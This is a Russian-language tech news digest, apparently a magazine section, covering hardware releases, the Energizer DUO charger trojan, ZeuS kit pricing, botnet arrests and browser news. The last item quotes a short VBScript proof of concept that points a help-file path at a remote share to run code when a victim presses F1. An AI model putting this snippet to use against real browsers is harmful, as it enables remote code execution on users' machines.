3D только в кино? Так уж — прямо дома!
Сразу целым рядом новых мониторов решила порадовать нас компания LG. В новые серии Е50 и Е40 войдут мониторы со светодиодной подсветкой (LED), серия W63D являет собой продвинутые геймерские 3D модели, плюс появится целый ряд новых ЖК мониторов с усовершенствованными функциями.
Остановимся подробнее на сериях E50 и E40. Модели этих серий отличаются ультратонким корпусом, всего 17.5 мм, что на треть тоньше большинства мониторов с флуоресцентной подсветкой (CCFL). Также светодиодная подсветка помогает снизить энергопотребление на 45% по сравнению с обычными мониторами. Время отклика для моделей обеих линеек составляет 5 мс, яркость 250 кд/m2, а уровень динамической контрастности 5 000 000:1. Серия E50 также обладает набором интеллектуальных функций Smart+: Auto Bright, Dual Web, Cinema Mode и Original Ratio, и оснащается «умными» подставками Two-way Stand, которые легко трансформируются в стойку, поддерживающую монитор подобно фоторамке. Также стоит отметить, что модель LG E2350V (старшая серии E50) — это первый монитор, получивший экологический сертификат Sustainable Product Certification от UL Environment, института, который осуществляет независимую оценку заявлений об экологичности.
В Кембридже выяснили, что секретные вопросы, используемые для восстановления паролей, зачастую упрощают взлом — с их помощью можно вскрыть каждый 80-ый аккаунт.
Троян с подзарядкой
Пожалуй, после прочтения этой новости ты сможешь со всей ответственности заявить, что дожил до самого настоящего киберпанка «здесь и сейчас». Западная ИТ-группа US-CERT обнаружила в безобидном на первый взгляд USB-заряднике Energizer DUO, предназначенном для АА и ААА батареек, самый настоящий трой. Зараза крылась в софте, позволяющем наблюдать за уровнем заряда батареи. Именно вместе с этой софтиной на машину устанавливается бэкдор, который ESET определяет как вредоносную программу Win32/Arurizer.A. Он открывает для входящих подключений 7777-й порт, позволяя гипотетическому злоумышленнику скачивать и запускать исполняемые файлы на зараженном ПК, удалять файлы, и получать от «больной» системы инфу. При этом никаких исходящих соединений не производится, а все модули троя удаляются во время деинсталляции программы. Energizer уже выпустил заявление, согласно которому, продажи устройств Energizer DUO были приостановлены, и проводится расследование, призванное выявить, как троян вообще попал в зарядники. При этом с сайта разработчиков можно было скачать точно такую же версию программы с интегрированным троем. В последней версии Metasploit есть модули energizer_duo_payload energizer_duo_detect, с помощью которого можно протестировать все хосты в заданном диапазоне на наличие троя и использовать его функционал.
Город XS
Поражающее воображение мультимедийное шоу было представлено 10 марта в галерее «Ателье №2» на ВИНЗАВОДе, в центре нового мегаполиса Winston XS. Инсталляция, изобилующая зеркалами, светом и цветами была создана известным художником и продюсером Павлом Каплевичем совместно с Winston XS. В проекте «Город XS» соединились два явления: современный мегаполис и оптическое искусство (иначе — оп-арт). Фантазия Каплевича подарила новый смысл и новую жизнь революционным открытиям оп-арта. Окунуться в ритм «Города XS» в течение марта мог любой желающий.
Не все дрова одинаково полезны
В начале марта компания NVidia выпустила предупреждение о том, что использование WHQL драйверов версии 196.75 опасно и может даже окончиться «смертью» видеокарты. К сожалению, эти данные уже подтверждены людьми, которые успели обновиться до злосчастной версии и, в итоге, поплатились проблемами охлаждением, во многих случаях приведшими к фатальным последствиям. Упомянутые драйвера действительно приводят к неполадкам в работе системы охлаждения — во время выполнения 3D-игр кулер видюхи замедляется, либо останавливается вовсе, в результате температура GPU могла превышать 100°C. В результате — перегрев, зависания и перезагрузки, а в худшем случае даже выход карты из строя. Производитель уже удалил опасные драйвера с сайта и настоятельно рекомендует пользователям, вернуться к версии 196.21, а 196.75, до исправления неполадки, обходить десятой дорогой. Удалить косячный драйвер из системы, если ты успел его установить можно с помощью утилиты Driver Sweeper (www.guru3d.com/category/driversweeper).
Финская компании Secunia подсчитала, что обычный Windows-юзер в среднем устанавливает на свою ось новый патч раз в 5 дней.
Ищу активатор для Windows7 троя
Создатель или создатели инструментария для разработки и поддержания ботнетов на базе известного трояна ZeuS жгут напалмом. Нет, конечно, такого рода софт всегда продавался за немалые деньги и был далеко непрост, но авторы ZeuS решили существенно «расширить горизонты». Им, очевидно, было мало того, что с недавних пор ZeuS выпускается в разных вариациях, обеспечивающих самый разносторонний функционал и сильно отличающихся по стоимости. Тут все как с приобретением автомобиля. Базовая комплектация Zeus Kit версии 1.3.4.x стоит от 3 до 4 тысяч долларов (старье, которое можно найти даже бесплатно, в расчет не берем), но дальше можно установить опции. Модуль для Backconnect стоит $1500, форм-граббер для Firefox’а — еще $2000, онлайн лог об украденных данных посредствам Jabber’а — $500, поддержка Vista/Windows 7 — $2000.
Часть опций продается приватно, например возможность доступа к удаленному рабочему столу через VNC стоит сразу $10000. Но это еще не все.
Теперь инструментарий, как настоящее серьезное ПО, обзавелся еще и системой активации, привязанной к аппаратной части машины. В целом эта система похожа на активацию Microsoft Windows, то есть, зарегистрированный билдер можно запускать только на одном, конкретном ПК.
Эксперты всего мира лишь разводят руками и в один голос сообщают, что с таким уровнем «лицензирования» малвари они сталкиваются впервые. Кроме того, доподлинно известно, что автор(ы) ZeuS уже во всю работают над новой версией трояна — 1.4. В новой версии обещают веб-инжекции в Firefox’е (динамическая подстановка нужного злоумышленникам HTML-контента), а также полиморфное шифрование.
Последнее означает, что ZeuS-троян будет криптовать свое тело каждый раз при заражении жертвы, поэтому тело вируса будет уникально на каждой машине. Антивирусы и сейчас детектят ZueS через раз, а уж полиморфное шифрование ситуацию явно не улучшит.
Киноманам и не только
Сегодня у многих людей компьютер играет роль домашнего медиацентра или кинотеатра.
Именно для таких пользователей тайваньская компания MSI и создала системную плату 890GXM-G65, на базе которой как раз предлагается создавать домашние кинотеатры. Плата построена на наборе системной логики AMD 890GX + SB850, и к ее отличительным особенностям можно отнести совместимость с новыми процами AMD Phenom II, а также встроенный графический процессор ATI Radeon HD 4290 с поддержкой DirectX 10.1 и UVD 2.0 и выходами DVI и HDMI. Также плата оснащена интерфейсами SATA 6 Гбит/с и USB 3.0. Выполнена 890GXMG65 в формате micro ATX и имеет два слота расширения PCI Express x16, один PCI Express x1 и один PCI. Для оперативной памяти отведено четыре слота, которые смогут «прожевать» до 16 ГБ DDR3 800, 1066, 1333, 1600, 1800 или 2133 ГГц. Плата поддерживает технологии CrossFire и Hybrid CrossFire, и благодаря технологии OC Genie хорошо поддается разгону.
Согласно подсчетам газеты «Коммерсант», месячная аудитория rutracker.org (экс torrents.ru), составляет 5,6 млн человек.
Рынок мобильных приложений
Мобильные приложения были всегда. Еще с появления J2ME мы устанавливали всевозможные приложения на свои сотовые, пытаясь совладать со спецификой телефона. Сейчас даже продавцы из овощного магазина сидят через Jimm в аське — вот она забавная российская специфика. Во всем же мире настоящий переворот совершила Apple, которой под силу оказалось то, что долгое время не удавалось другим — сделать мобильные приложения самым обычным делом не только для гиков, но и самых обычных людей. Создание AppStore, где приложение установить и купить не сложнее, чем совершить звонок, стало настоящей революцией.
Только вдумайся: в магазине сейчас доступно более 170 тысяч приложений, а еще в июне прошлого года их было только 50 тысяч. Причем это только те приложения, который прошли тщательную проверку самой Apple. Но мобильные приложения — это отнюдь не только пресловутый iPhone, который в России продают за бешенные деньги.
На подъеме и другие платформы. Несмотря на то, что в арсенале Android еще только 30 тысяч приложений для мобильной платформы от Google, действительно стоящих продуктов еще мало. В одной из статей номера мы приводим опыт одного из начинающих разработчиков, который не побоялся попробовать свои силы и получил вполне ощутимую прибыль. К чему это все? Да потому что это твой шанс, свободная ниша, которую вот-вот займут. Если раньше компании, сосредоточенные исключительно для работы над мобильными программа и играми, были редкостью, то сейчас среди стартапов — чуть ли не самое часто явление. Данные из графиков — тому в подтверждение.
Чипсы на ферме
Скорее всего, даже среди наших читателей найдутся люди, которые посредством приложения «Счастливый фермер» ведут ВКонтакте свое виртуальное хозяйство (не переживай, мы никому не скажем 🙂 ). Это простая математика, ведь «Фермером» уже увлеклись 7996 млн человек — на сегодня это самое популярное он-лайн приложение в Рунете. И вот на примере этого сверхуспешного таймкиллера компанией Code of Trade Digital и компанией Gameland был успешно реализован проект внедрения в игру бренда Lays. Игрокам предложили новую функцию, с помощью которой пользователь может производить собственные чипсы — юзерам выдали бесплатные семена картофеля, ингредиенты для производства чипсов, а также дали возможность установить на своей ферме завод по производству чипсов Lays. Такая реклама, в отличие от раздражающих баннеров и спама, пришлась людям по душе — за два месяца суммарно было произведено 400.656.889 пачек чипсов! Эксперимент определенно удался.
Office 2010 будет доступен в бизнес версии с 12 мая, а выход обычной версии намечается на июль.
Целая пачка интересного чтива
В сети всегда можно найти, что почитать — миллионы электронных книг, подборки учебной и научной литературы, огромное количество сайтов-библиотек, архивы комиксов, наконец… Но совсем недавно в инете стало еще одним интересным архивом больше, и мы считаем, что он достоин отдельного упоминания. Старое, уважаемое и в некотором роде культовое издание «Популярная наука» (Popular Science) выложило на своем сайте, в совершенно открытом и бесплатном доступе архив журналов на 137 лет! Найти весь этот пир духа, отсканированный проектом Google Books, можно по адресу www.popsci.com/archives. Для чтения, разумеется, потребуются знание английского языка и любовь к знаниям.
Да кому нужны эти ноутбуки!
Кардинальное решение представила на суд пользователей компания Thermaltake, выпустив mid-tower корпус V5 Black Edition с ручкой и колесиками для транспортировки. В самом деле, зачем нужны все эти ноутбуки? Взял системник и пошел в гости, вот тебе и полезные физические нагрузки (корпус весит 7,1 кг и имеет размеры 508х223х490 мм) и 100% репутация абсолютного гика. Шутки шутками, а «кузов» действительно хорош, внутри скрываются: девять мест под накопители типоразмеров 5.25», 3.5» и 2.5», с удобной съемной корзиной; блок питания, защищенный от пыли специальным фильтром и расположенный внизу корпуса; на переднюю панель вынесены порт eSATA, два порта USB 2.0 и фронтальные аудиоразъемы. Вентиляции тоже в достатке — два 120-мм на задней стенке, 200-мм вентилятор с синей подсветкой на верхней панели, а также есть возможность установить 120-мм вентиляторы для обдува видеокарты и жестких дисков. Рекомендованная цена корпуса составит $69.
И вашим и нашим
В деле кардера Альберта Гонсалеса, осуществившего крупнейшую в истории США кражу номеров кредитных карт, произошел довольно неожиданный поворот. Напомним, что Гонсалесу предъявлены 19 обвинений, и он полностью признал свою вину еще в конце прошло года.
Теперь его ждет суд, тюремный срок от 15 до 25 лет, а также штраф размером почти 3 млн долларов и конфискация имущества. Но недавно друг и сообщник главного кардера всея Штатов Стив Вэтт (Stephen Watt) сообщил миру, что все это время Гонсалес работал на американское правительство, а именно на Секретную службу США. По словам Вэтта, Гонсалесу платили $75 тыс. наличными в год за предоставление информации о других кардерах. Что характерно, Секретная служба отказывается комментировать этот вопрос. Видимо промышлять одним только кардингом, Гонсалесу было скучно.
Кадровые перемены
Тим Брэй, известнейший канадский ПО-разработчик, соучредитель компаний Open Text Corporation и Antarctica Systems, соавтор языка XML, покинул корпорацию Sun Microsystems, где до недавнего времени занимал пост директора по веб-технологиям. Справедливости ради отметим, что представители Oracle, в руки которой вот-вот перейдет Sun, предлагали Тиму остаться, но он не захотел. Новым место работы Брэйя станет команда разработчиков Google Android, о чем он поведал в своем блоге, под заголовком «Теперь я на территории, где нет зла» (Now A No-Evil Zone). Все в том же блоге Тим рассказал о том, что он разделяет философию Google, поддерживает их в борьбе против Apple iPhone и ему очень импонирует открытость платформы Android и дух open-source. По словам Брэйя: «Будущее мобильного Интернета с iPhone не включает в себя споры, полемику, секс и свободу, зато четко регламентирует, кому что разрешено знать и делать. Этакий стерильный диснеевский садик, окруженный со всех сторон высокой стеной и зубастыми адвокатами.
Люди, которые создают приложения, служат Хозяину и боятся его гнева. Мне это отвратительно». Что ж, надеемся, энтузиазм Тима не пропадет даром и скажется на Android самым лучшим образом.
Google покидает Китай
Громкий скандал, похоже, получит не менее громкое продолжение. Напомним, что в конце прошлого года ряд крупных компаний, в число которых входила и Google, подвергся атаке со стороны неизвестных хакеров. Впрочем, представители поискового гиганта почти сразу заявили, что по их данным взлом был заказной, и следы его ведут в Китай. Конечно, Китай такому заявлению не обрадовался и, в итоге, дошло до того, что Google вообще пригрозил китайским властям, свернуть свою деятельность в Поднебесной. Дело в том, что в связи с декабрьским хаком в обсуждениях выплыли и старые, не менее неприятные темы, в частности — цензура, которая действовала на Google.cn по просьбе властей. В итоге, после долгих переговоров, все закончилось довольно предсказуемо: в конце марта, несмотря на предупреждения властей Китая, Google все же прекратил цензурировать результаты поиска, и с google.cn появился редирект на google.com.hk, работающий без фильтрации. СМИ поднебесной тут же поспешили обвинить поисковик в связях с разведкой США. Похоже, что все действительно идет к закрытию представительства Google на территории Китая, так как переговоры с властями явно зашли в тупик.
Миллионы на взломе Captcha
Казалось бы, как можно заработать $25 млн на взломе CAPTCHA? Чуваки, которых сейчас судят в НьюДжерси, доказали, что такое более чем возможно. Схема их работы была проста: они перекупали на онлайновых распродажах билеты на концерты, спортивные состязания и так далее — в числе пострадавших Ticketmaster, Musictoday и Tickets.com. Чтобы имитировать покупки от лица частных граждан, предприимчивые ребята плотно пообщались с бывшими сотрудниками компаний распространителей билетов, зарегистрировали две фирмы, купили диапазоны IP-адресов и сняли в аренду сервера.
Но, как уже было сказано ранее, все основное действо строилось на взломе визуальных и звуковых CAPTCHA, которые использовали сайты онлайновой продажи билетов (также они отслеживают IP-адреса, телефоны и так далее). Боты имитировали даже задержку: от 5 до 10 секунд для визуальных капчтей, и 30 на звуковые. Прибегнув к помощи опытных программеров и вложив немалые деньги в разработку, мошенники сумели создать ботов, которые как орешки щелкали даже reCAPTCHA и аккуратно заполняли все поля анкет фейковыми адресами, телефонами и мейлами. Все эти данные для этого мошенникам предоставляли брокеры, делавшие заказы на те или иные билеты. Боты порой даже ошибались при наборе captcha, для вида якобы делая опечатки, что позволяло им лучше походить на людей. Итог этой масштабной аферы поражает — за период с 2002 по 2009 год группировка умудрилась заработать на перепродаже билетов более $25 млн! Сгубили же спекулянтов жадность и безнаказанность, например, в последние годы они в открытую искали в сети опытных специалистов по взлому CAPTCHA.
До этого до них трудились программисты из Болгарии. Особенно в данной истории интересно то, как им удалось взломать сервис reCAPTCHA, предоставляющий любым компаниям весьма надежную капчу. По всей видимости, капча не генерируется каждый раз заново — есть ограниченное, хотя и очень большое количество образцов. Если посмотреть на ссылку картинки, легко читается структура: https://api-secure.recaptcha.net/image?c=<ID картинки>. Авторам аферы удалось собрать ошеломляюще огромную базу ID и правильных ответов для CAPTCHA, который распознавались вручную. В обвинении не фигурирует ботнет и вирусы, собирающие такие данные, поэтому распознавание, похоже, проводили обычные люди — как обычно $1-2 за 1000 распознанных капч).
70% утечек информации происходит по вине собственных сотрудников компании.
Реквием по IE6
Уже несколько лет живучий браузер Internet Explorer 6 пытаются вытеснить с рынка, но никак не желает умирать. Если верить статистике www.liveinternet.ru, то в Рунете им по-прежнему пользуются 8.8% — но для сравнения у Opera Mini для мобильных телефонов всего на один процент меньше. Эта холодная война между разработчиками и браузером тянулась и тянулась, до тех пор, пока против «шестерки» не уговорились дружить сразу ряд крупных компаний, в число которых вошли Google (посредством YouTube), Facebook, MobileMe и многие другие. В начале марта Google и множество других компаний официально прекратили поддержку IE6, сняв со своих плеч этот тяжкий груз.
Компания Aten Design Group и вовсе устроила браузеру пышные похороны, о которых каким-то образом прознали в Microsoft, и из штаба софтверного гиганта прислали букет цветов (жаль не венок) с запиской. В записке говорилось: «Спасибо за все IE6, до встречи на MIX, где мы покажем кусочек рая для Internet Explorer’ов. Команда Internet Explorer @ Microsoft». Что ж, аминь.
Премия Тьюринга нашла еще одного лауреата
Ежегодная премия Тьюринга вручается компьютерным ученым и инженерам уже давно — с 1966 года, и удостаиваются ее лишь те, кто добился больших успехов в расширении границ информатики. Своим именем награда обязана английскому математику, пионеру компьютерных наук Алану Тьюрингу. На этот раз Ассоциация вычислительной техники (Association for Computing Machinery, ACM) удостоила наградой и чеком на $250 тыс. Чарльза Такера, как одного из изобретателей ПК, подключенного к сети. В середине 70-х Такер работал в Пало-Альто, в исследовательском центре корпорации Xerox, где под его руководством был создан прототип настольного компьютера Alto. Прототип нес в себе такие революционные на тот момент решения, как экран, аналогичный телевизионному, ГУИ и текстовый редактор WYSIWYG. Помимо Alto, Такер также внес огромный вклад в развитие Ethernet, работал над созданием прототипов первых многопроцессорных рабочих станций и даже первых планшетных ПК. На сегодняшний день Чарльз трудится в компании Microsoft.
Операция по спасению Mysql
Не так давно мы писали о том, что «отец» MySQL Майкл «Monty» Ведениус выступал против покупки Sun Microsystems компанией Oracle, опасаясь за судьбу своего детища после этого слияния. Когда у Веденисуса не получилось помешать сделке, он обратился за помощью к двум «сильным, самостоятельным странам, которые поддерживают движение open source» — России и Китаю. Как ни странно, наши власти судьбой СУБД действительно заинтересовались и решили поучаствовать в спасении «Мускула». Федеральная антимонопольная служба (ФАС) выдвинула компании Oracle условия, согласно которым последние будут обязаны после слияния совершенствовать и поддерживать MySQL в рамках общедоступной лицензии, не навязывая при этом услуги собственной техподдержки и не совершая иных «криминальных» деяний. Все это, конечно, весьма позитивно, но проблема в том, что Oracle, в случае чего, вряд ли примет условия ФАС в расчет — российский рынок слишком незначителен, чтобы ФАС могла реально воспрепятствовать сделке гигантов, или на них повлиять. Вряд ли угроза привлечения к административной ответственности будет воспринята в Oracle всерьез.
ПО данным компании Яндекс, число русскоязычных твиттян за зиму выросло на 42%.
Моноблочный звук от ASUS
Компания Asus с гордостью представила новинку в серии звуковых систем, которую, к тому же, называет самой компактной пятиканальной акустической системой в мире. Фишка в том, что вся пятиканальность разместилась, так сказать, в одном флаконе — ASUS Cine5 представляет собой аудиомоноблок размером 373x100x80 мм или 373x100x100 мм, в зависимости от того резиновая или металлическая подставка используется (обе входят в комплект). Технические характеристики новинки таковы: максимальная мощность системы равна 28 Вт (RMS 15 Вт), диапазон воспроизводимых частот простирается от 80 Гц до 20 кГц. Имеются у ASUS Cine5 и гнездо для подключения наушников и входы диаметром 3.5 мм. Для подключения к источнику многоканального звука (5.1) в комплект входит аналоговый кабель. Главной фишкой и удобством девайса, пожалуй, можно называть возможность формирования пятиканального звука из простого стереофонического сигнала.
Громкий арест ботоводов в Испании
Жирную галочку в своих отчетных документах смогут поставить испанские борцы с киберпреступностью, ведь им совместно с ФБР США удалось задержать сразу троих хакеров, причастных к созданию огромного ботнета Mariposa (по-испански «бабочка»), насчитывающему почти 13 млн компьютеров в 190 странах мира. Количество зараженных хостов удалось посчитать, когда удалось изменить DNS-записи, чтобы боты не могли коннектиться к своим управляющим серверам. О размахах ботнета говорит и тот факт, что в Испании оператор Vodafone продал 3000 свеженьких смартфонов HTC Magic, зараженных зловредным кодом, связанным с ботнетом Mariposa. Помимо обычных пользовательских машин, ботнет сумел распространиться на компьютеры компаний, входящих в список Fortune 1000 — топ крупнейших корпораций мира. Известно, что все трое задержанных — граждане Испании, которые называют себя DDP Team. Владельцев ботнета ловили долго.
Для известного снифера Wireshark даже был разработан специальный плагин (www.paloaltonetworks.com/researchcenter/2009/10/mariposatool), позволяющий на лету дешифровывать трафик между ботами и C&C сервером. Помог случай: один из хакеров — Netkairo, однажды обратился к админке с отключенным VPN-соединением и спалил свой настоящий IP. До этого момента все попытки вычислить владельцев ботнета были бессильны. Благодаря проведенной операции ботнет Mariposa свое существование прекратил, но миллионы зараженных машин по-прежнему ломятся на отключённый C&C (comand&control) сервер.
По данным Wimax Forum, доступом к Wimax сетям уже сегодня могут воспользоваться более 620 млн человек, а к 2011 году эта цифра достигнет 1 млрд.
Эксплорер умер, да здравствует эксплорер!
Не успел весь мир похоронить IE6, а Microsoft на конференции MIX уже показали девелоперам новый Internet Explorer 9. Скачать предварительную версию можно на сайте проекта: ie.microsoft.com/testdrive, здесь же досутпные разные тесты для того, чтобы прочувствовать все нововведения в действии.
Как ни странно, девятке нашлось, чем удивить и порадовать публику. Internet Explorer 9 стал первым браузером от «мелкомягких», использующим для повышения производительности ресурсы видеокарты. Это явно пошло «ослику» на пользу — по результатам теста SunSpider он стал быстрее IE8 примерно в семь раз, а Opera 10.10 — в четыре раза. Впрочем, новинка уступила по скорости работы с JavaScript Safari, Chrome и Opera 10.50. Также к хорошим новостям можно отнести значительное улучшение поддержки HTML5 и появление поддержки формата векторной графики SVG. С CSS3 все менее радужно, этот стандарт браузер все еще поддерживает не до конца и справляется с ним значительно хуже своих конкурентов — в тесте Acid3 IE9 набрал лишь 55 очков из 100. Удручает и еще одно — GPU-ускорение работает только в Vista и Windows 7, так что юзеры XP оказались в пролете — с XP новый браузер попросту не работает.
Ехал Canon через Canon
Чудные новости приходят с востока, а точнее из Японии, где компания Canon официально объявила о желании зарегистрировать, ни много ни мало, собственную доменную зону! Дело в том, что правила регистрации новых зон еще в 2008 году были пересмотрены и серьезно упрощены — если ранее для одобрения заявки требовалось доказать социальную важность и необходимость новой зоны, то сейчас это стало необязательно. Таким образом, вполне возможно, что зона .canon, а за ней, наверняка, и множество других, действительно получит право на жизнь. В Canon свое решение мотивируют тем, что новая зона позволит им создавать URL для каждой конкретной модели товара и региона. Выглядеть это будет примерно так: ru.a40.canon. Чем Canon не нравятся ссылки формата a40.canon.com или a40.canon.ru — загадка. Удастся ли японцам осуществить свою задумку и завести официальный сайт canon. canon, узнаем во второй половине 2011 года, когда ICANN рассмотрит заявку компании.
В Watchmouse пришли к выводу, что сайты, предоставляющие короткие url-адреса замедляют загрузку веб-страниц в среднем на полторы секунды.
Демосцена жива!
Известный сайт scene.org, целиком и полностью посвященный демосцене, традиционно собирается раздать слонов лучшим демомейкерам. В этом году вручение премии едва не сорвалось по причине нехватки у организаторов времени и ресурсов, но все же они смогли найти в себе силы, так что восьмая по счету Scene.org Awards состоится и церемония сохранит статус ежегодной. Если посмотреть работы, принимающие участие конкурсе (это можно и даже обязательно нужно сделать по адресу awards.scene.org), то понимаешь: демосцена жива. Видел бы ты, что творят номинанты на премии Best Demo, Best Demo on an Oldschool Platform, Best Effects. На скриншоте кадр из Frameranger’а — одного из главных номинантов на победу. Для его запуска, правда, понадобится видюха не менее geforce 8800, море оперативной и виртуальной памяти, быстрый проц и обязательно dx9. Призы найдут своих победителей в апреле в рамках немецкой демопати Breakpoint, где и пройдет официальная часть Scene.org Awards.
Нажимать F1 опасно!
Лулзы от компании Microsoft, это уже нечто вечное и неискоренимое, благодаря ним понимаешь, что в этом мире есть некое постоянство. Вот тебе очередной, свеженький перл от незабвенного MS — на этот раз «мелкомягкие» попросили пользователей не нажимать на кнопку F1, потому что это может привести к запуску малвари (через сценарий VBScript). И смех, и грех. Виной всему очередная уязвимость в браузерах IE любых версий, которая в самом деле позволяет запустить вредоносный код.
Используя VBScript, разработчик может показать пользователю сплывающее окно, используя следующий синтаксис для вызова функции: MsgBox(prompt[,buttons][,title][,helpfile,context]). Параметр helpfile, указывающий файл помощи, который отображается пользователю, если он нажмет в момент открытия диалогового окна F1, и это самое интересное место. Дело в том, что в качестве пути можно указать сетевой адрес шары. Например, на странице, где автор демонстрирует возможность атаки (http://isec. pl/poc-isec27) это выглядит так:
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.
hlp"
MsgBox "press F1 to close this
annoying popup", ,"", big, 1
</script>
Автор указывает путь специально составленного .hlp-файла, и уже через него вызывает нужный процесс на клиентской машине. Любопытно, что в самом конце марта Microsoft опубликовал сразу целый сборник заплаток для своего браузера, закрывающий сразу десять дыр, в том числе ту критическую, которая использовала Аврора.
Gigabyte Technology и Asus почти сравнялись по количеству продаж системных плат — за первые 2 месяца текущего года первые отгрузили 3,1-3,3 млн штук, вторые 3,2-3,3 млн.
